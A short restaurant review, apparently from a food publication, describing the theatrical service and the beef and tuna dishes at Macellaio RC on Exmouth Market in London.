restaurant Macellaio RC on Exmouth Market isn’t afraid of making a statement. Specialising in beef and tuna, the first thing you’ll notice upon entering is hunks of beef dry ageing in the window and huge tuna fish suspended from chains. During the meal, knives are thrown into the thick wooden tables by the waiters, menus arrive printed like a newspaper and one course, thin slices of beef and tuna carpaccio are served from a suspended wire.

This might not be to everyone’s taste but what can’t be denied is the quality of produce and dishes on offer. The steak especially could hold it’s place among London’s most celebrated, perfectly grilled and served simply with a healthy sprinkling of salt. Tuna steaks are also aged for a few days before cooking and have a meaty full flavour. While undoubtedly tuna and beef is the focus here, there are other things on offer – we loved a simple dish of pesto pasta just as much as THAT steak.
